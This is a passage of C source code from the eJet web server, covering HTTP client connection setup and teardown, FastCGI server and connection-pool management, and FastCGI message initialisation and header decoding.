arr_zero(pcon->msg_list);
}
pcon->rcv_state = HTTP_CON_NULL;
pcon->snd_state = HTTP_CON_IDLE;
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->tunnelcon) {
pcon->tunnelcon = NULL;
}
pcon->tunnelconid = 0;
pcon->read_ignored = 0;
#ifdef HAVE_OPENSSL
if (pcon->sslctx) {
pcon->sslctx = NULL;
}
if (pcon->ssl_link) {
if (pcon->ssl) {
http_ssl_free(pcon->ssl);
pcon->ssl = NULL;
}
}
#endif
if (frame_size(pcon->rcvstream) > 16384)
frame_delete(&pcon->rcvstream);
frame_empty(pcon->rcvstream);
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
if (pcon->life_timer) {
iotimer_stop(pcon->life_timer);
pcon->life_timer = NULL;
}
if (mgmt && mgmt->con_pool)
bpool_recycle(mgmt->con_pool, pcon);
else
http_con_free(pcon);
return 0;
}
int http_con_close (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
if (http_mgmt_con_del(gp_httpmgmt, pcon->conid) != pcon) {
return -2;
}
if (pcon->srv) {
http_srv_con_del(pcon->srv, pcon->conid);
}
return http_con_recycle(pcon);
}
void * http_con_open (void * vsrv, char * dstip, int dstport, int ssl_link)
{
HTTPSrv * srv = (HTTPSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
HTTPCon * pcon = NULL;
if (srv) {
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return NULL;
pcon = http_con_fetch(mgmt);
if (!pcon) return NULL;
strcpy(pcon->dstip, srv->ip);
pcon->dstport = srv->port;
pcon->casetype = HTTP_CLIENT;
pcon->ssl_link = srv->ssl_link;
pcon->srv = srv;
} else {
mgmt = gp_httpmgmt;
pcon = http_con_fetch(mgmt);
if (!pcon) return NULL;
strcpy(pcon->dstip, dstip);
pcon->dstport = dstport;
pcon->casetype = HTTP_CLIENT;
pcon->ssl_link = ssl_link;
pcon->srv = NULL;
}
time(&pcon->stamp);
if (http_con_connect(pcon) < 0) {
http_srv_set_active(pcon->srv, 0);
return NULL;
}
http_srv_con_add(srv, pcon);
return pcon;
}
int http_con_connect (void * vpcon)
{
HTTPCon * pcon = (HTTPCon *)vpcon;
HTTPMgmt * mgmt = NULL;
int ret = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
for (pcon->retrytimes++ ; pcon->retrytimes < 3; pcon->retrytimes++) {
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
EnterCriticalSection(&pcon->rcvCS);
pcon->pdev = eptcp_connect(pcon->pcore,
pcon->dstip, pcon->dstport,
NULL, 0,
(void *)pcon->conid, &ret,
http_pump, pcon->mgmt);
if (!pcon->pdev) {
LeaveCriticalSection(&pcon->rcvCS);
continue;
}
if (ret >= 0) { //connect successfully
LeaveCriticalSection(&pcon->rcvCS);
ret = http_con_connected(pcon);
if (ret < 0) continue;
} else {
pcon->snd_state = HTTP_CON_CONNECTING;
pcon->ready_timer = iotimer_start(pcon->pcore,
mgmt->srv_connecting_time * 1000,
t_http_srv_con_build,
(void *)pcon->conid,
http_pump, pcon->mgmt);
LeaveCriticalSection(&pcon->rcvCS);
}
return 0;
}
tolog(1, "eJet - TCP Connect: failed connecting to '%s:%d'.\n",
pcon->dstip, pcon->dstport);
if (pcon->pdev) {
iodev_close(pcon->pdev);
pcon->pdev = NULL;
}
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
pcon->snd_state = HTTP_CON_IDLE;
http_con_close(pcon);
return -100;
}
int http_con_connected (void * vpcon)
{
HTTPCon * pcon = (HTTPCon *)vpcon;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
http_srv_set_active(pcon->srv, 1);
pcon->rcv_state = HTTP_CON_READY;
pcon->snd_state = HTTP_CON_SEND_READY;
if (pcon->ready_timer) {
iotimer_stop(pcon->ready_timer);
pcon->ready_timer = NULL;
}
time(&pcon->stamp);
pcon->life_timer = iotimer_start(mgmt->pcore,
mgmt->conn_check_interval * 1000,
t_http_srv_con_life,
(void *)pcon->conid,
http_pump,
mgmt);
#ifdef HAVE_OPENSSL
if (pcon->ssl_link) {
pcon->sslctx = http_srv_ssl_ctx_get(pcon->srv, pcon);
pcon->ssl = http_ssl_new(pcon->sslctx, pcon);
pcon->ssl_handshaked = 0;
pcon->snd_state = HTTP_CON_SSL_HANDSHAKING;
return http_ssl_connect(pcon);
}
#endif
/* send request to the origin server instantly after connected */
if (arr_num(pcon->msg_list) > 0 || http_srv_msg_num(pcon->srv) || pcon->httptunnel > 0) {
http_srv_send(pcon);
}
return 0;
}
char * http_con_srcip (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return "";
return pcon->srcip;
}
int http_con_srcport (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return -1;
return pcon->srcport;
}
int http_con_reqnum (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return 0;
return pcon->reqnum;
}
ulong http_con_id (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return 0;
return pcon->conid;
}
void * http_con_iodev (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
if (!pcon) return NULL;
return pcon->pdev;
}
int http_con_msg_add (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
int i, num;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
msg->pcon = pcon;
msg->conid = pcon->conid;
num = arr_num(pcon->msg_list);
for (i = 0; i < num; i++) {
if (arr_value(pcon->msg_list, i) == msg) {
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
}
arr_push(pcon->msg_list, msg);
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
int http_con_msg_del (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!pcon) return -1;
if (!msg) return -2;
EnterCriticalSection(&pcon->msglistCS);
arr_delete_ptr(pcon->msg_list, msg);
if (msg->pcon == pcon)
msg->pcon = NULL;
if (msg->conid == pcon->conid)
msg->conid = 0;
if (pcon->msg == msg)
pcon->msg = NULL;
LeaveCriticalSection(&pcon->msglistCS);
return 0;
}
void * http_con_msg_first (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
msg = arr_value(pcon->msg_list, 0);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
void * http_con_msg_last (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = NULL;
int num = 0;
if (!pcon) return NULL;
EnterCriticalSection(&pcon->msglistCS);
num = arr_num(pcon->msg_list);
if (num > 0)
msg = arr_value(pcon->msg_list, num - 1);
LeaveCriticalSection(&pcon->msglistCS);
return msg;
}
<|start_filename|>src/http_fcgi_srv.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_con.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_io.h"
int http_fcgisrv_init (void * vsrv);
int http_fcgisrv_free (void * vsrv);
int http_fcgisrv_recycle (void * vsrv);
void * http_fcgisrv_fetch (void * vmgmt);
int http_fcgisrv_cmp_cgisrv (void * a, void * b)
{
FcgiSrv * psrv = (FcgiSrv *)a;
char * cgisrv = (char *)b;
if (!psrv || !cgisrv) return -1;
return strcasecmp(psrv->cgisrv, cgisrv);
}
int http_mgmt_fcgisrv_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
InitializeCriticalSection(&mgmt->fcgisrvCS);
mgmt->fcgisrv_table = ht_only_new(13, http_fcgisrv_cmp_cgisrv);
if (!mgmt->fcgisrv_pool) {
mgmt->fcgisrv_pool = mpool_alloc();
mpool_set_initfunc (mgmt->fcgisrv_pool, http_fcgisrv_init);
mpool_set_freefunc (mgmt->fcgisrv_pool, http_fcgisrv_free);
mpool_set_unitsize (mgmt->fcgisrv_pool, sizeof(FcgiSrv));
mpool_set_allocnum (mgmt->fcgisrv_pool, 2);
}
if (!mgmt->fcgicon_pool) {
mgmt->fcgicon_pool = mpool_alloc();
mpool_set_initfunc (mgmt->fcgicon_pool, http_fcgicon_init);
mpool_set_freefunc (mgmt->fcgicon_pool, http_fcgicon_free);
mpool_set_unitsize (mgmt->fcgicon_pool, sizeof(FcgiCon));
mpool_set_allocnum (mgmt->fcgicon_pool, 16);
}
if (!mgmt->fcgimsg_pool) {
mgmt->fcgimsg_pool = mpool_alloc();
mpool_set_initfunc (mgmt->fcgimsg_pool, http_fcgimsg_init);
mpool_set_freefunc (mgmt->fcgimsg_pool, http_fcgimsg_free);
mpool_set_unitsize (mgmt->fcgimsg_pool, sizeof(FcgiMsg));
mpool_set_allocnum (mgmt->fcgimsg_pool, 32);
}
tolog(1, "eJet - FastCGI module (Unix Socket/TCP) init.\n");
return 0;
}
int http_mgmt_fcgisrv_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
int i, num;
if (!mgmt) return -1;
if (mgmt->fcgisrv_table) {
num = ht_num(mgmt->fcgisrv_table);
for (i = 0; i < num; i++) {
srv = ht_value(mgmt->fcgisrv_table, i);
http_fcgisrv_free(srv);
}
ht_free(mgmt->fcgisrv_table);
mgmt->fcgisrv_table = NULL;
}
DeleteCriticalSection(&mgmt->fcgisrvCS);
if (mgmt->fcgisrv_pool) {
mpool_free(mgmt->fcgisrv_pool);
mgmt->fcgisrv_pool = NULL;
}
if (mgmt->fcgicon_pool) {
mpool_free(mgmt->fcgicon_pool);
mgmt->fcgicon_pool = NULL;
}
if (mgmt->fcgimsg_pool) {
mpool_free(mgmt->fcgimsg_pool);
mgmt->fcgimsg_pool = NULL;
}
tolog(1, "eJet - FastCGI module (Unix Socket/TCP) cleaned.\n");
return 0;
}
int http_mgmt_fcgisrv_add (void * vmgmt, void * vsrv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = (FcgiSrv *)vsrv;
if (!mgmt) return -1;
if (!srv) return -2;
EnterCriticalSection(&mgmt->srvCS);
ht_set(mgmt->fcgisrv_table, &srv->cgisrv, srv);
LeaveCriticalSection(&mgmt->srvCS);
return 0;
}
void * http_mgmt_fcgisrv_del (void * vmgmt, char * cgisrv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->srvCS);
srv = ht_delete(mgmt->fcgisrv_table, cgisrv);
LeaveCriticalSection(&mgmt->srvCS);
return srv;
}
void * http_mgmt_fcgisrv_get (void * vmgmt, char * cgisrv)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
if (!mgmt) return NULL;
EnterCriticalSection(&mgmt->srvCS);
srv = ht_get(mgmt->fcgisrv_table, cgisrv);
LeaveCriticalSection(&mgmt->srvCS);
return srv;
}
int http_fcgisrv_init (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
if (!srv) return -1;
srv->cgisrv[0] = '\0';
srv->socktype = 0;
memset(srv->ip, 0, sizeof(srv->ip));
srv->port = 0;
InitializeCriticalSection(&srv->msgCS);
srv->msgid = 1;
if (!srv->msg_table) {
srv->msg_table = ht_only_new(300, http_fcgimsg_cmp_msgid);
ht_set_hash_func(srv->msg_table, http_fcgimsg_hash_msgid);
}
ht_zero(srv->msg_table);
if (!srv->msg_fifo) srv->msg_fifo = ar_fifo_new(4);
ar_fifo_zero(srv->msg_fifo);
srv->maxcon = 1;
InitializeCriticalSection(&srv->conCS);
srv->conid = 1;
if (!srv->con_tree) {
srv->con_tree = rbtree_new(http_fcgicon_cmp_conid, 1);
}
rbtree_zero(srv->con_tree);
if (srv->life_timer) {
iotimer_stop(srv->life_timer);
srv->life_timer = NULL;
}
return 0;
}
int http_fcgisrv_free (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
rbtnode_t * rbtn = NULL;
FcgiCon * pcon = NULL;
FcgiMsg * msg = NULL;
int i, num;
if (!srv) return -1;
if (srv->life_timer) {
iotimer_stop(srv->life_timer);
srv->life_timer = NULL;
}
DeleteCriticalSection(&srv->conCS);
num = rbtree_num(srv->con_tree);
rbtn = rbtree_min_node(srv->con_tree);
for (i = 0; i < num && rbtn; i++) {
pcon = RBTObj(rbtn);
rbtn = rbtnode_next(rbtn);
if (!pcon) continue;
http_fcgicon_close(pcon);
}
rbtree_free(srv->con_tree);
/* note: http_fcgicon_close should recycle the FcgiMsg instance to srv->msg_fifo */
num = ht_num(srv->msg_table);
for (i = 0; i < num; i++) {
msg = ht_value(srv->msg_table, i);
if (!msg) continue;
http_fcgimsg_close(msg);
}
ht_free(srv->msg_table);
DeleteCriticalSection(&srv->msgCS);
ar_fifo_free(srv->msg_fifo);
return 0;
}
int http_fcgisrv_recycle (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiCon * pcon = NULL;
rbtnode_t * rbtn = NULL;
int i, num;
if (!srv) return -1;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt || !mgmt->fcgisrv_pool)
return http_fcgisrv_free(srv);
if (srv->life_timer) {
iotimer_stop(srv->life_timer);
srv->life_timer = NULL;
}
num = rbtree_num(srv->con_tree);
rbtn = rbtree_min_node(srv->con_tree);
for (i = 0; i < num && rbtn; i++) {
pcon = RBTObj(rbtn);
rbtn = rbtnode_next(rbtn);
http_fcgicon_close(pcon);
}
rbtree_zero(srv->con_tree);
/* note: http_fcgicon_close should recycle the FcgiMsg instance to srv->msg_fifo */
while (ar_fifo_num(srv->msg_fifo) > 0)
http_msg_close(ar_fifo_out(srv->msg_fifo));
ar_fifo_zero(srv->msg_fifo);
mpool_recycle(mgmt->fcgisrv_pool, srv);
return 0;
}
void * http_fcgisrv_fetch (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
if (!mgmt) return NULL;
srv = mpool_fetch(mgmt->fcgisrv_pool);
if (!srv) {
srv = kzalloc(sizeof(*srv));
http_fcgisrv_init(srv);
}
if (!srv) return NULL;
srv->mgmt = mgmt;
srv->pcore = mgmt->pcore;
return srv;
}
static int fcgisrv_parse (FcgiSrv * srv)
{
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
if (!srv) return -1;
pbgn = srv->cgisrv;
pend = pbgn + strlen(pbgn);
if (strncasecmp(pbgn, "unix:", 5) == 0) {
srv->socktype = 1;
str_secpy(srv->unixsock, sizeof(srv->unixsock)-1, pbgn + 5, pend - pbgn - 5);
return 0;
}
if (strncasecmp(pbgn, "fastcgi://", 10) == 0) {
srv->socktype = 0;
pbgn += 10;
poct = skipTo(pbgn, pend - pbgn, ":", 1);
if (poct > pbgn) {
str_secpy(srv->ip, sizeof(srv->ip) - 1, pbgn, poct - pbgn);
}
if (poct + 1 < pend && *poct == ':') {
srv->port = strtol(poct + 1, NULL, 10);
}
return 0;
}
return -2;
}
void * http_fcgisrv_open (void * vmgmt, char * cgisrv, int maxcon)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
FcgiSrv * srv = NULL;
uint8 newalloc = 0;
if (!mgmt || !cgisrv) return NULL;
srv = http_mgmt_fcgisrv_get(mgmt, cgisrv);
if (!srv) {
srv = http_fcgisrv_fetch(mgmt);
if (!srv) return NULL;
newalloc = 1;
strncpy(srv->cgisrv, cgisrv, sizeof(srv->cgisrv)-1);
fcgisrv_parse(srv);
http_mgmt_fcgisrv_add(mgmt, srv);
}
srv->maxcon = maxcon;
if (srv->maxcon < 20) srv->maxcon = 50;
time(&srv->stamp);
if (newalloc)
srv->life_timer = iotimer_start(mgmt->pcore,
mgmt->srv_check_interval * 1000,
t_fcgi_srv_life,
(void *)srv,
http_fcgisrv_pump, srv);
return srv;
}
int http_fcgisrv_close(void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
if (!srv) return -1;
mgmt = (HTTPMgmt *)srv->mgmt;
if (http_mgmt_fcgisrv_del(mgmt, srv->cgisrv) == NULL) return 0;
return http_fcgisrv_recycle(srv);
}
uint16 http_fcgisrv_get_msgid (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
uint16 msgid = 1;
if (!srv) return msgid;
EnterCriticalSection(&srv->conCS);
if (srv->msgid == 0)
srv->msgid = 1;
msgid = srv->msgid++;
LeaveCriticalSection(&srv->conCS);
return msgid;
}
ulong http_fcgisrv_get_conid (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
ulong conid = 0;
if (!srv) return conid;
EnterCriticalSection(&srv->conCS);
if (srv->conid == 0)
srv->conid = 1;
conid = srv->conid++;
LeaveCriticalSection(&srv->conCS);
return conid;
}
void * http_fcgisrv_connect (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
rbtnode_t * rbtn = NULL;
int connum = 0;
int i = 0;
if (!srv) return NULL;
EnterCriticalSection(&srv->conCS);
connum = rbtree_num(srv->con_tree);
rbtn = rbtree_min_node(srv->con_tree);
for (i = 0; i < connum && rbtn; i++) {
pcon = RBTObj(rbtn);
rbtn = rbtnode_next(rbtn);
if ( !pcon ||
pcon->snd_state == FCGI_CON_FEEDING ||
arr_num(pcon->msg_list) > 0)
continue;
LeaveCriticalSection(&srv->conCS);
return pcon;
}
LeaveCriticalSection(&srv->conCS);
return http_fcgicon_open(srv);
}
int http_fcgisrv_msg_add (void * vsrv, void * vmsg)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!srv) return -1;
if (!msg) return -2;
EnterCriticalSection(&srv->msgCS);
ht_set(srv->msg_table, &msg->msgid, msg);
LeaveCriticalSection(&srv->msgCS);
return 0;
}
void * http_fcgisrv_msg_get (void * vsrv, uint16 msgid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->msgCS);
msg = ht_get(srv->msg_table, &msgid);
LeaveCriticalSection(&srv->msgCS);
return msg;
}
void * http_fcgisrv_msg_del (void * vsrv, uint16 msgid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->msgCS);
msg = ht_delete(srv->msg_table, &msgid);
LeaveCriticalSection(&srv->msgCS);
return msg;
}
int http_fcgisrv_msg_push (void * vsrv, void * vmsg)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!srv) return -1;
if (!msg) return -2;
EnterCriticalSection(&srv->msgCS);
ar_fifo_push(srv->msg_fifo, msg);
LeaveCriticalSection(&srv->msgCS);
return 0;
}
void * http_fcgisrv_msg_pull (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->msgCS);
msg = ar_fifo_out(srv->msg_fifo);
LeaveCriticalSection(&srv->msgCS);
return msg;
}
int http_fcgisrv_msg_num (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
int num = 0;
if (!srv) return 0;
EnterCriticalSection(&srv->msgCS);
num = ar_fifo_num(srv->msg_fifo);
LeaveCriticalSection(&srv->msgCS);
return num;
}
int http_fcgisrv_con_add (void * vsrv, void * vpcon)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = (FcgiCon *)vpcon;
if (!srv) return -1;
if (!pcon) return -2;
EnterCriticalSection(&srv->conCS);
rbtree_insert(srv->con_tree, &pcon->conid, pcon, NULL);
LeaveCriticalSection(&srv->conCS);
return 0;
}
void * http_fcgisrv_con_get (void * vsrv, ulong conid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->conCS);
pcon = rbtree_get(srv->con_tree, &conid);
LeaveCriticalSection(&srv->conCS);
return pcon;
}
void * http_fcgisrv_con_del (void * vsrv, ulong conid)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
if (!srv) return NULL;
EnterCriticalSection(&srv->conCS);
pcon = rbtree_delete(srv->con_tree, &conid);
LeaveCriticalSection(&srv->conCS);
return pcon;
}
int http_fcgisrv_con_num (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
int num = 0;
if (!srv) return 0;
EnterCriticalSection(&srv->conCS);
num = rbtree_num(srv->con_tree);
LeaveCriticalSection(&srv->conCS);
return num;
}
int http_fcgisrv_lifecheck (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiMsg * iter = NULL;
int msgnum = 0;
int connum = 0;
int i = 0, num = 0;
arr_t * explist = NULL;
time_t curt;
if (!srv) return -1;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return -2;
/* srv->stamp should be set timestamp when net-IO occurs,
* if Net does not connected, srv->stamp will retain the original value */
time(&curt);
msgnum = http_fcgisrv_msg_num(srv);
connum = http_fcgisrv_con_num(srv);
if ( msgnum == 0 && connum == 0 &&
curt > srv->stamp &&
curt - srv->stamp >= mgmt->fcgi_srv_alive_time)
{
return http_fcgisrv_close(srv);
}
EnterCriticalSection(&srv->msgCS);
num = ar_fifo_num(srv->msg_fifo);
for (i = 0; i < num; i++) {
iter = ar_fifo_value(srv->msg_fifo, i);
if (iter && curt - iter->createtime > 30) {
if (explist == NULL)
explist = arr_new(4);
arr_push(explist, ar_fifo_out(srv->msg_fifo));
num--; i--;
} else break;
}
LeaveCriticalSection(&srv->msgCS);
num = arr_num(explist);
for (i = 0; i < num; i++) {
iter = arr_value(explist, i);
http_msg_close(iter);
}
if (explist) arr_free(explist);
msgnum = http_fcgisrv_msg_num(srv);
if (connum < msgnum) {
if (connum <= 10 && msgnum <= 10) {
num = msgnum;
} else if (connum <= msgnum/2) {
num = msgnum/2;
} else {
num = msgnum * 2 / 3;
}
for (i = connum; i <= num && i <= srv->maxcon; i++) {
http_fcgisrv_connect(srv);
}
}
srv->life_timer = iotimer_start(mgmt->pcore,
mgmt->srv_check_interval * 1000,
t_fcgi_srv_life,
(void *)srv,
http_fcgisrv_pump, srv);
return 0;
}
int http_fcgisrv_pump (void * vsrv, void * vobj, int event, int fdtype)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
FcgiCon * pcon = NULL;
int cmd = 0;
ulong conid = 0;
if (!srv) return -1;
switch (event) {
case IOE_INVALID_DEV:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->pdev == vobj) {
return http_fcgicon_close(pcon);
}
break;
case IOE_READ:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_CONNECTED || fdtype == FDT_USOCK_CONNECTED) {
return http_fcgi_recv(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_WRITE:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_CONNECTED || fdtype == FDT_USOCK_CONNECTED) {
return http_fcgi_send(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_CONNECTED:
conid = (ulong)iodev_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
EnterCriticalSection(&pcon->rcvCS);
if (pcon && pcon->pdev == vobj) {
LeaveCriticalSection(&pcon->rcvCS);
return http_fcgicon_connected(pcon);
} else {
LeaveCriticalSection(&pcon->rcvCS);
return -20;
}
break;
case IOE_TIMEOUT:
cmd = iotimer_cmdid(vobj);
if (cmd == t_fcgi_srv_life) {
return http_fcgisrv_lifecheck(srv);
} else if (cmd == t_fcgi_srv_con_life) {
conid = (ulong)iotimer_para(vobj);
pcon = http_fcgisrv_con_get(srv, conid);
if (pcon && pcon->life_timer == vobj) {
return http_fcgi_con_lifecheck(pcon);
}
}
break;
}
return -1;
}
<|start_filename|>src/http_fcgi_msg.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_header.h"
#include "http_chunk.h"
#include "http_variable.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_con.h"
#include "http_fcgi_msg.h"
int fcgi_header_type_valid (uint8 type, int resp)
{
if (!resp) {
switch (type) {
case FCGI_BEGIN_REQUEST:
case FCGI_ABORT_REQUEST:
case FCGI_PARAMS:
case FCGI_STDIN:
case FCGI_GET_VALUES:
case FCGI_UNKNOWN_TYPE:
return 1;
default:
return 0;
}
}
switch (type) {
case FCGI_END_REQUEST:
case FCGI_STDOUT:
case FCGI_STDERR:
case FCGI_GET_VALUES_RESULT:
case FCGI_UNKNOWN_TYPE:
return 1;
default:
return 0;
}
return 0;
}
int fcgi_header_decode (void * p, int len, FcgiHeader * hdr)
{
uint8 * pbyte = (uint8 *)p;
int i = 0;
uint16 val = 0;
if (!pbyte) return -1;
if (len < 8) return -2;
if (!hdr) return -3;
hdr->version = pbyte[i++];
hdr->type = pbyte[i++];
val = pbyte[i++];
val <<= 8;
val += pbyte[i++];
hdr->reqid = val;
val = pbyte[i++];
val <<= 8;
val += pbyte[i++];
hdr->contlen = val;
hdr->padding = pbyte[i++];
hdr->reserved = pbyte[i++];
return i;
}
int http_fcgimsg_cmp_fcgimsg (void * a, void *b)
{
FcgiMsg * msga = (FcgiMsg *)a;
FcgiMsg * msgb = (FcgiMsg *)b;
if (!msga) return -1;
if (!msgb) return 1;
return msga->msgid - msgb->msgid;
}
int http_fcgimsg_cmp_msgid (void * a, void *b)
{
FcgiMsg * msg = (FcgiMsg *)a;
uint16 msgid = *(uint16 *)b;
return msg->msgid - msgid;
}
ulong http_fcgimsg_hash_msgid (void * key)
{
ulong hash = *(uint16 *)key;
return hash;
}
int http_fcgimsg_init (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
msg->msgid = 0;
msg->httpmsg = NULL;
msg->req_body_flag = 0;
msg->req_body_length = 0;
msg->req_body_iolen = 0;
msg->req_stream_sent = 0;
msg->reqsent = 0;
if (msg->req_rcvs_list == NULL) {
msg->req_rcvs_list = arr_new(4);
}
arr_zero(msg->req_rcvs_list);
if (msg->req_body_chunk == NULL) {
msg->req_body_chunk = chunk_new(8192);
}
chunk_zero(msg->req_body_chunk);
msg->fcgi_role = FCGI_RESPONDER;
msg->fcgi_keep_alive = 1; //1;
if (msg->fcgi_request == NULL)
msg->fcgi_request = frame_new(512);
frame_empty(msg->fcgi_request);
msg->req_header_length = 0;
http_fcgimsg_stdin_init(msg);
memset(msg->fcgi_abort, 0, sizeof(msg->fcgi_abort));
msg->app_status = 0;
msg->proto_status = 0;
msg->got_all_header = 0;
msg->got_end_request = 0;
memset(&msg->cgihdr, 0, sizeof(msg->cgihdr));
msg->conid = 0;
msg->pcon = NULL;
msg->stamp = time(&msg->createtime);
return 0;
}
int http_fcgimsg_free (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
if (msg->req_rcvs_list) {
arr_pop_free(msg->req_rcvs_list, frame_free);
msg->req_rcvs_list = NULL;
}
if (msg->req_body_chunk) {
chunk_free(msg->req_body_chunk);
msg->req_body_chunk = NULL;
}
frame_delete(&msg->fcgi_request);
return 0;
}
void * http_fcgimsg_fetch (void * vsrv)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMgmt * mgmt = NULL;
FcgiMsg * msg = NULL;
if (!srv) return NULL;
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) return NULL;
msg = mpool_fetch(mgmt->fcgimsg_pool);
if (!msg) {
msg = kzalloc(sizeof(*msg));
http_fcgimsg_init(msg);
}
msg->msgid = http_fcgisrv_get_msgid(srv);
msg->srv = srv;
http_fcgisrv_msg_add(srv, msg);
return msg;
}
int http_fcgimsg_recycle (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
FcgiSrv * srv = NULL;
HTTPMgmt * mgmt = NULL;
if (!msg) return -1;
srv = (FcgiSrv *)msg->srv;
if (!srv) {
return http_fcgimsg_free(msg);
}
mgmt = (HTTPMgmt *)srv->mgmt;
if (!mgmt) {
return http_fcgimsg_free(msg);
}
while (arr_num(msg->req_rcvs_list) > 0)
frame_free(arr_pop(msg->req_rcvs_list));
arr_zero(msg->req_rcvs_list);
chunk_zero(msg->req_body_chunk);
frame_empty(msg->fcgi_request);
mpool_recycle(mgmt->fcgimsg_pool, msg);
return 0;
}
